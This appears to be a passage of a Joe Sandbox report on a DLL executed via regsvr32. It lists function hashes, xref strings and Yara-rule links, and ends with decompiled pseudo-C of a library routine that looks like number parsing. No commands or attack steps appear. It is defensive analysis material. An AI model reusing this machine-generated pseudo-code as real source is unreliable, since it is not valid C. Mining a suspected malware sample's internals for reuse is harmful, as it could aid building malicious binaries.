Associated: 00000008.00000002.1292227331.00007FFD2B0CC000.00000010.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292247071.00007FFD2B0CD000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd2b060000_regsvr32.jbxd

Similarity

API ID: InfoLocale_amsg_exit_getptd
String ID:
API String ID: 488165793-0
Opcode ID: 55397dfc4091b28f02ede2eb07137ca85c789b17678921f484a064c378350ee2
Instruction ID: db5aafffd617b28294fff2ff54ad9494421486e6b34d1f3bb3169ded9ab4f103
Opcode Fuzzy Hash: 55397dfc4091b28f02ede2eb07137ca85c789b17678921f484a064c378350ee2
Instruction Fuzzy Hash: 3231A132B0A6C287EB5A8B21DE657E9B391FB89745F000135D61E472A1DF7CF464E780

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180009B84 Relevance: 4.4, Strings: 3, Instructions: 647COMMON

Download Yara Rule

Strings

#^, xrefs: 000000018000A07B
%x, xrefs: 000000018000A3E8
l", xrefs: 000000018000A47B

Memory Dump Source

Source File: 00000008.00000002.1291594477.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: #^$%x$l"
API String ID: 0-4041194889
Opcode ID: 84424837eb03941410a3f76e65ed3fc17bb7311e13e60ee642fa55eb5908a1bd
Instruction ID: b3cce10ddb190bf118b68c611af786d042642d553b16e0a3995a72445ede7a32
Opcode Fuzzy Hash: 84424837eb03941410a3f76e65ed3fc17bb7311e13e60ee642fa55eb5908a1bd
Instruction Fuzzy Hash: E9522971A087888FD758CFA8C58A69EFBF1FB84744F10891DE48697292D7F49909CF42

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180008E68 Relevance: 4.2, Strings: 3, Instructions: 408COMMON

Download Yara Rule

Strings

cY, xrefs: 000000018000947A
#X, xrefs: 00000001800092B0
R+n/, xrefs: 0000000180009365

Memory Dump Source

Source File: 00000008.00000002.1291594477.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: #X$R+n/$cY
API String ID: 0-1545568711
Opcode ID: a7848f88ff10e79ab8d01caa9368a18d567130ab1c2b00234daf7e93b79d0f26
Instruction ID: 13f53fdcfb62dda9c0ce2c9061e0ae3b387f6ee7310669008ccd30eb16d24df7
Opcode Fuzzy Hash: a7848f88ff10e79ab8d01caa9368a18d567130ab1c2b00234daf7e93b79d0f26
Instruction Fuzzy Hash: 0D12F07550660DCBDB68CF38C08A5DD3BE1FF54308F609129FC6A8A6A2D774DA29CB44

Uniqueness

Uniqueness Score: -1.00%

Function 000000018000A678 Relevance: 4.1, Strings: 3, Instructions: 335COMMON

Download Yara Rule

Strings

@KlA, xrefs: 000000018000A7C8
{JR, xrefs: 000000018000AA72
>Z.5, xrefs: 000000018000A8BC

Memory Dump Source

Source File: 00000008.00000002.1291594477.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: >Z.5$@KlA${JR
API String ID: 0-750345803
Opcode ID: 7657476ff6717f1e5b0e5d94934980a5e5aef6ec125d6f0b080d643f310ec32c
Instruction ID: 0ea8de14f4fe38b8525413eb773a45742b7529844c892c158d549e4966fc3e11
Opcode Fuzzy Hash: 7657476ff6717f1e5b0e5d94934980a5e5aef6ec125d6f0b080d643f310ec32c
Instruction Fuzzy Hash: FAF1F5B050460ACFDB99DF28C089ADE3BE0FF58308F414529FC499B2A4D774DA68DB85

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180021E8C Relevance: 4.0, Strings: 3, Instructions: 254COMMON

Download Yara Rule

Strings

T4), xrefs: 0000000180021F5A
d%1o, xrefs: 0000000180021FDD
'1, xrefs: 000000018002215A

Memory Dump Source

Source File: 00000008.00000002.1291594477.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: '1$T4)$d%1o
API String ID: 0-2486972274
Opcode ID: e6f62019d710a5b172c4250af764a7eeb339ec63b800c2c32e0ab43b0a18c95f
Instruction ID: c1cf03e1cc09df8c2f46dc436ecb0f80ab6fb145c51dc220b48891136fb5fa69
Opcode Fuzzy Hash: e6f62019d710a5b172c4250af764a7eeb339ec63b800c2c32e0ab43b0a18c95f
Instruction Fuzzy Hash: FAC1E2B0514788DFEB9CDF68D89A99A3BB1FB44348F40521DFD0687290D7B9D984CB80

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800026B0 Relevance: 4.0, Strings: 3, Instructions: 224COMMON

Download Yara Rule

Strings

x, xrefs: 0000000180002866
dz, xrefs: 0000000180002745
&K, xrefs: 0000000180002705

Memory Dump Source

Source File: 00000008.00000002.1291594477.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: &K$dz$x
API String ID: 0-1229252104
Opcode ID: 8e3dcf654908fc5c38a7b4cc2b258c0506f91cc2d39a8b8a8dc4c959054faaa9
Instruction ID: d8247fa3af4584371774d9dabd2bd270506ba23bb1c3a634e6552bef147d5643
Opcode Fuzzy Hash: 8e3dcf654908fc5c38a7b4cc2b258c0506f91cc2d39a8b8a8dc4c959054faaa9
Instruction Fuzzy Hash: 99A14C7191475E9BDF8CDFA4C88AAEEBBB1FB48304F40521CE856A7290D7749A44CF81

Uniqueness

Uniqueness Score: -1.00%

Function 000000018001EBFC Relevance: 3.9, Strings: 3, Instructions: 169COMMON

Download Yara Rule

Strings

U8, xrefs: 000000018001EC7B
h, xrefs: 000000018001EDB1
/+, xrefs: 000000018001EDE3

Memory Dump Source

Source File: 00000008.00000002.1291594477.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: h$/+$U8
API String ID: 0-883878234
Opcode ID: bbb7fe14f810a7f592b745030da0a777cb7d19ff1c3e8944ff20fcc5bed3dcc1
Instruction ID: 8ba44556e78e3b7b521574266816ad51746ed91dbe2c7fd63154e8208677f515
Opcode Fuzzy Hash: bbb7fe14f810a7f592b745030da0a777cb7d19ff1c3e8944ff20fcc5bed3dcc1
Instruction Fuzzy Hash: 79813A7051078D9BEF98CF24C8896DD3BA0FB483A8F556319FC4AA6290D778D984CF85

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180017A40 Relevance: 3.9, Strings: 3, Instructions: 142COMMON

Download Yara Rule

Strings

^", xrefs: 0000000180017C1C
08, xrefs: 0000000180017BDD
L, xrefs: 0000000180017B46

Memory Dump Source

Source File: 00000008.00000002.1291594477.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: 08$L$^"
API String ID: 0-1177260694
Opcode ID: cda29e72dc0740c08e8cabbcfcebe2f422bf50595165a4267de80d834ce0b007
Instruction ID: c24403862857c4391aef1775248313adb0a3cae486fea517e37fc1e65729cc2b
Opcode Fuzzy Hash: cda29e72dc0740c08e8cabbcfcebe2f422bf50595165a4267de80d834ce0b007
Instruction Fuzzy Hash: C07191B190070ACFDB48CF68D48A5DE7FB1FB64394F204619F856A62A0D7B496A5CFC0

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180023B90 Relevance: 3.9, Strings: 3, Instructions: 121COMMON

Download Yara Rule

Strings

SZ, xrefs: 0000000180023BFC
?E, xrefs: 0000000180023C79
%5, xrefs: 0000000180023BA3

Memory Dump Source

Source File: 00000008.00000002.1291594477.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: %5$?E$SZ
API String ID: 0-3267399798
Opcode ID: 356b9b99ff3a14a20e6022121f0725c4e131dc2ac3521a6c48dc14c0b171b3d4
Instruction ID: f20e76e41e2807c6fad9d95e83e5c487efb7f78554c70ad00382b9e6556e21f0
Opcode Fuzzy Hash: 356b9b99ff3a14a20e6022121f0725c4e131dc2ac3521a6c48dc14c0b171b3d4
Instruction Fuzzy Hash: 3751297050078A8BDF4DDF28C85A6DE3BA1FB48348F004A1EF8569A290D7B8D664CBC5

Uniqueness

Uniqueness Score: -1.00%

Function 000000018000CCB8 Relevance: 3.9, Strings: 3, Instructions: 113COMMON

Download Yara Rule

Strings

3, xrefs: 000000018000CE08
#X, xrefs: 000000018000CDB9
h, xrefs: 000000018000CD76

Memory Dump Source

Source File: 00000008.00000002.1291594477.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: #X$h$3
API String ID: 0-1294449413
Opcode ID: d33c58d9fea67c5e00cdb9e1060bb575a3469de7f64f2d8bd581db19eefcf863
Instruction ID: 533291a7926cdd32bbd6e8d0b2b75c126a7da38aa02169e8600aaa2a8b3730e0
Opcode Fuzzy Hash: d33c58d9fea67c5e00cdb9e1060bb575a3469de7f64f2d8bd581db19eefcf863
Instruction Fuzzy Hash: BE51D2B090038E8FCF48CF68D8865DE7FB1BB58344F104A1DEC26AA260D7B49665CF85

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800131C8 Relevance: 3.8, Strings: 3, Instructions: 94COMMON

Download Yara Rule

Strings

rS, xrefs: 00000001800132E0
'?jD, xrefs: 000000018001336A
3x, xrefs: 000000018001333C

Memory Dump Source

Source File: 00000008.00000002.1291594477.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: '?jD$3x$rS
API String ID: 0-3606170153
Opcode ID: 0195267ce7e32bc4f7cb68084bc8e103216764e823e79de5164a2b429b297a6c
Instruction ID: 22f802b9e0c13350431e6e4f18d77c177e48155c8e78565d29df3f89ed4fee09
Opcode Fuzzy Hash: 0195267ce7e32bc4f7cb68084bc8e103216764e823e79de5164a2b429b297a6c
Instruction Fuzzy Hash: 4F51C3B190074E8FDB88CF68C48A4DE7FB0FB28398F214619F815A6260D3B49695CFC5

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800072A4 Relevance: 3.8, Strings: 3, Instructions: 91COMMON

Download Yara Rule

Strings

]k, xrefs: 00000001800073A1
Hw, xrefs: 00000001800072F8
e, xrefs: 0000000180007351

Memory Dump Source

Source File: 00000008.00000002.1291594477.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: Hw$]k$e
API String ID: 0-2033964818
Opcode ID: 4f1e176e105d723653331bdcb9e16093c0b1e22302329eb9766838a011bfa736
Instruction ID: ffab61b7d51d9aa5314773a45aff0a62ca8de6911970cb555a5cd4c3076be265
Opcode Fuzzy Hash: 4f1e176e105d723653331bdcb9e16093c0b1e22302329eb9766838a011bfa736
Instruction Fuzzy Hash: 1341C3B190078E8FDF48CF68C8864DE7BB0FB58358F104618F865AA294D7B89665CF85

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180006B54 Relevance: 3.8, Strings: 3, Instructions: 90COMMON

Download Yara Rule

Strings

>, xrefs: 0000000180006C62
H0, xrefs: 0000000180006BFA
n\, xrefs: 0000000180006C4D

Memory Dump Source

Source File: 00000008.00000002.1291594477.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: H0$n\$>
API String ID: 0-2038091953
Opcode ID: 8399669adf6ddd7989a1b34c04c5480f1e14aba376e11fdf5ca5adfde3ef8d91
Instruction ID: d237bd2cff9410b0a87333e933cab55eb302b172400644dcabb4729d10ca93ef
Opcode Fuzzy Hash: 8399669adf6ddd7989a1b34c04c5480f1e14aba376e11fdf5ca5adfde3ef8d91
Instruction Fuzzy Hash: D941D7B090078E8BDF48CF64C88A5DE7BB0FB18358F50461DE866A6290D3B8D665CFC5

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800055F4 Relevance: 3.8, Strings: 3, Instructions: 85COMMON

Download Yara Rule

Strings

EJ, xrefs: 0000000180005644
M7, xrefs: 000000018001DE29
N{, xrefs: 0000000180005615

Memory Dump Source

Source File: 00000008.00000002.1291594477.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: EJ$M7$N{
API String ID: 0-2550331091
Opcode ID: 36cb4f404964e622fbf7bea85eafd490b092147ddbe8c5081c760fe9dc435426
Instruction ID: 7a959005074046617e79b82f9e95c96a422290a3f5572b8545b4ca99a373dd00
Opcode Fuzzy Hash: 36cb4f404964e622fbf7bea85eafd490b092147ddbe8c5081c760fe9dc435426
Instruction Fuzzy Hash: D831157091CB849BE394DF28C48960BBBE0FBD4758F501A1DF595862A0CBB8D905CF47

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180005498 Relevance: 3.8, Strings: 3, Instructions: 82COMMON

Download Yara Rule

Strings

ZE, xrefs: 000000018000550D
ot, xrefs: 00000001800054BB
FO, xrefs: 00000001800055B0

Memory Dump Source

Source File: 00000008.00000002.1291594477.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: FO$ZE$ot
API String ID: 0-4035839399
Opcode ID: 61be06ea8247c94d34133f7dfef71fb7ca9e5d1a546109e228ade6049ba6761e
Instruction ID: 27ee06656677cc7ccddd3fd26b57a7f095700a92caf8e6414df9046cc9819dff
Opcode Fuzzy Hash: 61be06ea8247c94d34133f7dfef71fb7ca9e5d1a546109e228ade6049ba6761e
Instruction Fuzzy Hash: AB31E1715487899FE788DF29C08991ABBE2FBC4784F505A1DF4868B3A1C7B4D845CB83

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180002504 Relevance: 3.8, Strings: 3, Instructions: 73COMMON

Download Yara Rule

Strings

YQ, xrefs: 0000000180002510
_0, xrefs: 0000000180002626
d, xrefs: 0000000180002508

Memory Dump Source

Source File: 00000008.00000002.1291594477.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: YQ$_0$d
API String ID: 0-2605670869
Opcode ID: 7a41b8197c9ae054c4a83515f5825b8901cf0b17c4f6c0d99e0cb46bf0b8a9ea
Instruction ID: 985f46bedf30828a6a7e54d09bf240b70eb6b6ee6361518d330bfa71303131e7
Opcode Fuzzy Hash: 7a41b8197c9ae054c4a83515f5825b8901cf0b17c4f6c0d99e0cb46bf0b8a9ea
Instruction Fuzzy Hash: C2319270629780AFD3C8DF28D49991ABBE1FBC8314F90AA1DF8868B390D774D405CB06

Uniqueness

Uniqueness Score: -1.00%

Function 000000018000B888 Relevance: 3.8, Strings: 3, Instructions: 69COMMON

Download Yara Rule

Strings

MT, xrefs: 000000018000B90E
,r, xrefs: 000000018000B8F1
u2., xrefs: 000000018000B961

Memory Dump Source

Source File: 00000008.00000002.1291594477.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: ,r$MT$u2.
API String ID: 0-185580064
Opcode ID: 09032eae2515d87e10fbacd3000b8d4fc28dd18ad5809f69da51fd6fc7c1c2b4
Instruction ID: 83f262825fa791e81a9ae374cf65c3c4bccc3cdc670fad59fb58d236b9e605aa
Opcode Fuzzy Hash: 09032eae2515d87e10fbacd3000b8d4fc28dd18ad5809f69da51fd6fc7c1c2b4
Instruction Fuzzy Hash: 86317F705187C58BD748DFA9C48A51AFBE1BBC4344F504A1DF4828A7A1D7F4E899CB43

Uniqueness

Uniqueness Score: -1.00%

Function 000000018000E850 Relevance: 3.8, Strings: 3, Instructions: 66COMMON

Download Yara Rule

Strings

%PA7, xrefs: 000000018000E8ED
%PA7, xrefs: 000000018000E8E9
=Y, xrefs: 000000018000E93D

Memory Dump Source

Source File: 00000008.00000002.1291594477.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: %PA7$%PA7$=Y
API String ID: 0-462617205
Opcode ID: 1c4529c5f768f7c21780f76799fc2d238f8102db03b4cae3b5e9412d32e5cc50
Instruction ID: d25d1b0b152f0bfde1e121c16e8b250b83a0b176dc0a16c28c2a337e6c910ad8
Opcode Fuzzy Hash: 1c4529c5f768f7c21780f76799fc2d238f8102db03b4cae3b5e9412d32e5cc50
Instruction Fuzzy Hash: 6F314BB15087858BD748DF28C45941ABBE1FB9C308F814B1DF8CAAB291D779D605CF4A

Uniqueness

Uniqueness Score: -1.00%

Function 000000018001337C Relevance: 3.8, Strings: 3, Instructions: 52COMMON

Download Yara Rule

Strings

&n, xrefs: 00000001800133A1
5tv, xrefs: 00000001800133C0
-, xrefs: 0000000180013432

Memory Dump Source

Source File: 00000008.00000002.1291594477.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: &n$-$5tv
API String ID: 0-2448688631
Opcode ID: 29bcf347d3bcbf683e7f25c8fd40e479166cba1f8f6b47def536886c980d9076
Instruction ID: 7781fa40618f99ab286c39c5376f825e8cdabb89e55de0fb4cb768d259995b38
Opcode Fuzzy Hash: 29bcf347d3bcbf683e7f25c8fd40e479166cba1f8f6b47def536886c980d9076
Instruction Fuzzy Hash: C421027001A784ABE3C5DF24C5CA65BBAE1FB98784F90691CF886C22A1D778C944CB02

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD2B07C7C0 Relevance: 3.6, APIs: 2, Instructions: 613
COMMONLIBRARYCODECrypto

Download Yara Rule

C-Code - Quality: 76%

			E00007FFD7FFD2B07C7C0(signed short __rbx, long long __rcx, long long __rdx, intOrPtr* __r8, void* __r9) {
				void* __rsi;
				void* __rbp;
				intOrPtr _t144;
				intOrPtr _t152;
				signed short _t160;
				signed short _t161;
				signed int _t177;
				signed short _t178;
				intOrPtr _t179;
				signed int _t185;
				signed short _t220;
				signed short _t221;
				signed int _t225;
				signed int _t226;
				intOrPtr _t232;
				intOrPtr _t234;
				void* _t235;
				intOrPtr _t237;
				void* _t238;
				intOrPtr _t239;
				void* _t240;
				intOrPtr _t241;
				void* _t253;
				intOrPtr _t278;
				void* _t314;
				signed int _t367;
				signed int _t368;
				signed long long _t378;
				signed long long _t379;
				intOrPtr* _t387;
				signed long long _t388;
				signed short _t389;
				signed long long _t395;
				unsigned long long _t398;
				intOrPtr* _t400;
				intOrPtr* _t405;
				intOrPtr* _t406;
				void* _t410;
				void* _t413;
				void* _t415;
				intOrPtr* _t420;
				intOrPtr* _t421;
				intOrPtr* _t423;
				intOrPtr* _t426;
				intOrPtr* _t428;
				short* _t433;
				void* _t435;
				char* _t436;
				char* _t437;
				intOrPtr* _t440;
				intOrPtr* _t443;
				void* _t444;
				intOrPtr* _t447;

				_t389 = __rbx;
				 *((long long*)(_t415 + 0x18)) = __rbx;
				_push(_t410);
				_push(_t444);
				_t413 = _t415 - 7;
				_t378 =  *0x2b0c70a0; // 0xf787487f4682
				_t379 = _t378 ^ _t415 - 0x000000a0;
				 *(_t413 - 1) = _t379;
				_t447 =  *((intOrPtr*)(_t413 + 0x7f));
				 *(_t413 - 0x71) = r9d;
				_t6 = _t389 + 1; // 0x1
				r9d = _t6;
				 *((long long*)(_t413 - 0x59)) = __rcx;
				 *((long long*)(_t413 - 0x69)) = __rdx;
				_t436 = _t413 - 0x21;
				 *(_t413 - 0x6d) = 0;
				 *(_t413 - 0x75) = r9d;
				r14d = 0;
				 *(_t413 - 0x79) = 0;
				r15d = 0;
				r12d = 0;
				if (_t447 != 0) goto 0x2b07c83a;
				E00007FFD7FFD2B067698(_t379);
				 *_t379 = 0x16;
				E00007FFD7FFD2B069444();
				goto 0x2b07cffb;
				_t144 =  *__r8;
				if (_t144 == 0x20) goto 0x2b07c850;
				if (_t144 == 9) goto 0x2b07c850;
				if (_t144 == 0xa) goto 0x2b07c850;
				if (_t144 != 0xd) goto 0x2b07c855;
				goto 0x2b07c83d;
				_t420 = __r8 + __r9 + __r9;
				if (0 - 5 > 0) goto 0x2b07ca7e;
				if (0 == 5) goto 0x2b07ca64;
				r9d = 0;
				if (0 == 0) goto 0x2b07ca03;
				r9d = r9d - 1;
				if (0 == 0) goto 0x2b07c9bb;
				r9d = r9d - 1;
				if (0 == 0) goto 0x2b07c968;
				r9d = r9d - 1;
				if (0 == 0) goto 0x2b07c91b;
				r9d = r9d - 1;
				if (0 != 0) goto 0x2b07cb43;
				r9d = 1;
				r14d = r9d;
				 *(_t413 - 0x79) = r9d;
				if (0 != 0) goto 0x2b07c8db;
				goto 0x2b07c8b5;
				_t232 =  *_t420;
				r12d = r12d - r9d;
				_t421 = _t420 + __r9;
				if (_t232 == 0x30) goto 0x2b07c8ac;
				goto 0x2b07c8db;
				if (_t232 - 0x39 > 0) goto 0x2b07c8e0;
				if (0 - 0x19 >= 0) goto 0x2b07c8d5;
				_t253 = 0 + r9d;
				 *_t436 = _t232 - 0x30;
				_t437 = _t436 + __r9;
				r12d = r12d - r9d;
				_t234 =  *_t421;
				if (_t234 - 0x30 >= 0) goto 0x2b07c8bc;
				if (_t234 == 0x2b) goto 0x2b07c90e;
				if (_t234 == 0x2d) goto 0x2b07c90e;
				if (_t234 - 0x43 <= 0) goto 0x2b07ca3d;
				if (_t234 - 0x45 <= 0) goto 0x2b07c904;
				_t235 = _t234 - 0x64;
				if (_t235 - r9b > 0) goto 0x2b07ca3d;
				goto 0x2b07c855;
				_t423 = _t421 + __r9 - __r9;
				goto 0x2b07c855;
				r9d = 1;
				r14d = r9d;
				goto 0x2b07c948;
				if (_t235 - 0x39 > 0) goto 0x2b07c94c;
				if (_t253 - 0x19 >= 0) goto 0x2b07c93f;
				 *_t437 = _t235 - 0x30;
				goto 0x2b07c942;
				r12d = r12d + r9d;
				_t237 =  *_t423;
				if (_t237 - 0x30 >= 0) goto 0x2b07c928;
				if (_t237 !=  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_t447 + 0x128))))))) goto 0x2b07c8e0;
				goto 0x2b07c855;
				if (0x30 - 8 > 0) goto 0x2b07c982;
				r9d = 1;
				goto 0x2b07c855;
				if (_t237 !=  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_t447 + 0x128))))))) goto 0x2b07c9a4;
				r9d = 1;
				goto 0x2b07c855;
				if (_t237 != 0x30) goto 0x2b07cba4;
				r9d = 1;
				goto 0x2b07c855;
				r9d = 1;
				r14d = r9d;
				if (0x30 - 8 > 0) goto 0x2b07c9d1;
				goto 0x2b07c97a;
				if (_t237 ==  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_t447 + 0x128))))))) goto 0x2b07c95e;
				if (_t237 == 0x2b) goto 0x2b07c90e;
				if (_t237 == 0x2d) goto 0x2b07c90e;
				if (_t237 == 0x30) goto 0x2b07c9b3;
				goto 0x2b07c8ea;
				if (0x30 - 8 <= 0) goto 0x2b07c96f;
				_t395 =  *((intOrPtr*)( *_t447 + 0x128));
				_t387 =  *_t395;
				if (_t237 ==  *_t387) goto 0x2b07c994;
				if (_t237 == 0x2b) goto 0x2b07ca56;
				if (_t237 == 0x2d) goto 0x2b07ca45;
				if (_t237 == 0x30) goto 0x2b07c9ad;
				r9d = 1;
				_t426 = _t423 + __r9 - __r9 - __r9;
				goto 0x2b07cbad;
				 *(_t413 - 0x6d) = 0x8000;
				goto 0x2b07c999;
				 *(_t413 - 0x6d) = 0;
				goto 0x2b07c999;
				_t238 = _t237 - 0x30;
				 *(_t413 - 0x79) = r9d;
				_t314 = _t238 - 9;
				if (_t314 > 0) goto 0x2b07cb4d;
				goto 0x2b07c97a;
				r9d = 4;
				r9d = r9d - 6;
				if (_t314 == 0) goto 0x2b07cb27;
				r9d = r9d - 1;
				if (_t314 == 0) goto 0x2b07cb03;
				r9d = r9d - 1;
				if (_t314 == 0) goto 0x2b07cad7;
				r9d = r9d - 1;
				if (_t314 == 0) goto 0x2b07cb52;
				if (r9d != 2) goto 0x2b07cb43;
				if ( *((intOrPtr*)(_t413 + 0x77)) == 0) goto 0x2b07ca37;
				if (_t238 == 0x2b) goto 0x2b07cacd;
				if (_t238 != 0x2d) goto 0x2b07cba4;
				 *(_t413 - 0x75) =  *(_t413 - 0x75) | 0xffffffff;
				goto 0x2b07c999;
				goto 0x2b07c999;
				r9d = 1;
				r15d = r9d;
				goto 0x2b07cae8;
				_t239 =  *_t426;
				if (_t239 == 0x30) goto 0x2b07cae2;
				_t240 = _t239 - 0x31;
				if (_t240 - 8 > 0) goto 0x2b07ca3d;
				goto 0x2b07c97a;
				if (0x30 - 8 > 0) goto 0x2b07cb14;
				goto 0x2b07c974;
				if (_t240 != 0x30) goto 0x2b07cba4;
				goto 0x2b07c999;
				_t443 = _t426 + __r9 - 2;
				if (__rdx - 0x31 - 8 <= 0) goto 0x2b07cb0a;
				if (_t240 == 0x2b) goto 0x2b07cb3e;
				if (_t240 == 0x2d) goto 0x2b07cabf;
				goto 0x2b07cb14;
				if (7 == 0xa) goto 0x2b07cba7;
				goto 0x2b07c999;
				_t428 = _t443;
				goto 0x2b07cbad;
				r9d = 1;
				r11b = 0x30;
				r15d = r9d;
				goto 0x2b07cb7d;
				if (_t240 - 0x39 > 0) goto 0x2b07cb9a;
				_t35 = _t395 * 2; // 0xf787487f4652
				if (_t387 + _t35 - 0x30 - 0x1450 > 0) goto 0x2b07cb84;
				_t241 =  *_t428;
				if (_t241 - r11b >= 0) goto 0x2b07cb60;
				goto 0x2b07cb9a;
				goto 0x2b07cb9a;
				if (_t241 - 0x39 > 0) goto 0x2b07ca3d;
				if ( *((intOrPtr*)(_t428 + __r9)) - r11b >= 0) goto 0x2b07cb8b;
				goto 0x2b07ca3d;
				r9d = 1;
				_t388 =  *((intOrPtr*)(_t413 - 0x69));
				 *_t388 = _t443;
				if (r14d == 0) goto 0x2b07cfd1;
				if (_t253 + r9d - 0x18 <= 0) goto 0x2b07cbda;
				_t152 =  *((intOrPtr*)(_t413 - 0xa));
				if (_t152 - 5 < 0) goto 0x2b07cbcf;
				 *((char*)(_t413 - 0xa)) = _t152 + r9b;
				r12d = r12d + r9d;
				if (0x18 != 0) goto 0x2b07cbf2;
				goto 0x2b07cfe0;
				r12d = r12d + r9d;
				_t440 = _t437 + __r9 - __r9 - __r9;
				if ( *_t440 == 0) goto 0x2b07cbed;
				E00007FFD7FFD2B07DBCC(0xffffffffffffffff, 0x1451, __rbx, _t413 - 0x21, __rdx, _t410, _t413, _t413 - 0x41, __r9);
				if ( *(_t413 - 0x75) >= 0) goto 0x2b07cc10;
				if (r15d != 0) goto 0x2b07cc1b;
				if ( *(_t413 - 0x79) != 0) goto 0x2b07cc23;
				if (0x1451 - 0x1450 > 0) goto 0x2b07cfbb;
				if (0x1451 - 0xffffebb0 < 0) goto 0x2b07cfab;
				if (0x1451 == 0) goto 0x2b07cf99;
				if (0x1451 >= 0) goto 0x2b07cc5d;
				if ( *(_t413 - 0x71) != 0) goto 0x2b07cc66;
				 *(_t413 - 0x41) = 0;
				if (0x1451 == 0) goto 0x2b07cf99;
				r10d = 0x7fff;
				r12d = 1;
				 *(_t413 - 0x71) =  ~( ~0x1451 + r12d +  *((intOrPtr*)(_t413 + 0x67)) -  *((intOrPtr*)(_t413 + 0x6f))) >> 3;
				 *((long long*)(_t413 - 0x61)) = 0x2b0c8700;
				if (0x1451 == 0) goto 0x2b07cf91;
				r15d = 0x8000;
				_t405 = 0x2b0c8700 + (_t388 + _t388 * 2) * 4;
				if ( *_t405 - r15w < 0) goto 0x2b07ccca;
				_t398 =  *_t405;
				_t406 = _t413 - 0x31;
				 *(_t413 - 0x31) = _t398;
				 *((intOrPtr*)(_t413 - 0x29)) =  *((intOrPtr*)(_t405 + 8));
				 *((intOrPtr*)(_t413 - 0x2f)) = 0 - r12d;
				_t160 =  *(_t406 + 0xa) & 0x0000ffff;
